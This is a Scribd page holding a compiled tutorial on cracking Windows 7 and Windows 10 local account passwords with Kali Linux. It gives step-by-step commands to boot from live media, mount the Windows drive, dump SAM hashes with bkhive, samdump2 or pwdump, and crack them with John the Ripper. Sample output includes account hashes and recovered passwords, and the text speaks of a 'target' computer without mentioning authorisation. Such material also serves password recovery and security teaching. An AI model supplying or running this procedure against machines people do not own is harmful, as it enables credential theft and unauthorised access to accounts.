Thanks to visit codestin.com
Credit goes to www.scribd.com

Scribd
Upload
31 views3 pages

Crack Windows 7 Passwords Using Kali Linux

This document provides a tutorial on how to crack Windows 7 passwords using Kali Linux, specifically utilizing tools like 'bkhive', 'samdump2', and 'John the Ripper'. It outlines the necessary steps to boot Kali Linux, mount the Windows partition, dump the password hashes, and finally crack the passwords. Additionally, it mentions considerations for cracking Windows 10 passwords and provides alternative methods for different versions of Kali Linux.

Uploaded by

Kashif Majeed Janjua
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
31 views3 pages

Crack Windows 7 Passwords Using Kali Linux

This document provides a tutorial on how to crack Windows 7 passwords using Kali Linux, specifically utilizing tools like 'bkhive', 'samdump2', and 'John the Ripper'. It outlines the necessary steps to boot Kali Linux, mount the Windows partition, dump the password hashes, and finally crack the passwords. Additionally, it mentions considerations for cracking Windows 10 passwords and provides alternative methods for different versions of Kali Linux.

Uploaded by

Kashif Majeed Janjua
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 3

Crack Windows 7 passwords using Kali Linux

In this tutorial, we will use 'bkhive','samdump2', and 'John the Ripper' in Kali Linux to crack Windows 7
passwords.

For this tutorial, you need


a) Kali Linux LiveDVD
b) A Windows 7 machine

Perform the following steps:

1) Boot the machine using Kali Linux LiveDVD

2) Open the terminal window, and view the list of partitions on disk
root@kali:~# lsblk

3) Mount the Windows partition


root@kali:~# mount /dev/sda2 /mnt

4) Traverse to the SAM database directory.


root@kali:~# cd /mnt/Windows/System32/config

5) View 'SYSTEM' file in 'config' directory.


root@kali:/mnt/Windows/System32/config# ls

6) Dump the syskey bootkey from Windows System Hive


root@kali:/mnt/Windows/System32/config# bkhive SYSTEM hive.txt
bkhive 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: [email protected]

Root Key : CMI-CreateHive{F10156BE-0E87-4EFB-969E-5DA29D131144}


Default ControlSet: 001
Bootkey: 9055be7eb881423834eda4a7427acbe0

7) Dump the Windows password hashes.


root@kali:/mnt/Windows/System32/config# samdump2 SAM hive.txt > hash.txt
samdump2 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: [email protected]

Root Key : CMI-CreateHive{899121E8-11D8-44B6-ACEB-301713D5ED8C}

8) View the hash file


root@kali:/mnt/Windows/System32/config# cat hash.txt
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
shabbir:1000:aad3b435b51404eeaad3b435b51404ee:638fc14bdf05a6445d5a1e5c1f81fe5d:::
Batul:1004:aad3b435b51404eeaad3b435b51404ee:674e48b68c5cd0efd8f7e5faa87b3d1e:::
Ali:1005:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
9) Crack password hashes using John the Ripper
root@kali:/mnt/Windows/System32/config# john --format=nt2 hash.txt
Created directory: /root/.john
Loaded 5 password hashes with no different salts (NT MD4 [128/128 SSE2 intrinsics 12x])
shabbir (shabbir)
admin (Ali)
(Administrator)
(Guest)
welcome (Batul)
guesses: 5 time: 0:00:00:00 DONE (Thu May 7 00:05:01 2015) c/s: 59142 trying: please - zephyr

https://linux-hacking-guide.blogspot.com/2015/05/crack-windows-7-passwords-using-kali.html

Using John the Ripper to Crack Passwords


Posted by admin on October 4, 2014

Posted in: Linux OS, Security.

It appears the 1607 build of Windows 10 breaks the cracking of passwords with pwdump and
samdump2.

To crack a Windows 10 Local account password in Kali Linux 2.0 you will need to mount the drive,
locate the directory containing the SAM file, dump the password hashes to a file, and then crack with
John the Ripper.

Restart the target Windows computer with your KALI Linux 2.0 system. From time to time when you
try to access the hard drive containing the Windows partition you may receive an error message
related to the Windows hibernation file. To avoid this, shutdown Windows at the command prompt
with the command:

shutdown /s /t 0

This should prevent the hibernation file problem. Once you are in KALI, open up FILES and select
your Windows hard drive to mount it. Open a terminal window and enter the command

mount

to determine the path to your Windows hard drive. Most of the time the Windows hard drive will be
the last mount point in the list, normally something like /dev/sda1. Your path will be something
like /media/root/OSDisk. Browse to your mount point/Windows/System32/config folder. Use the
follwoing command to create a dump of the Windows passwords:

pwdump SYSTEM SAM > /root/Desktop/SAM2

Then use John the Ripper to break the passwords.

john /root/Desktop/SAM2 –format=NT

For Kali Linux prior to version 2.0

Open terminal
Open drive in Computer so it will mount
mount to see location of drive
change to /Windows/System32/config folder in mount point

bkhive SYSTEM /root/hive.txt


samdump2 SAM /root/hive.txt > /root/hash.txt

john /root/hash.txt –format=nt2

https://sinjinsmith.net/?p=46

https://www.computersecuritystudent.com/HOME/index.html

You might also like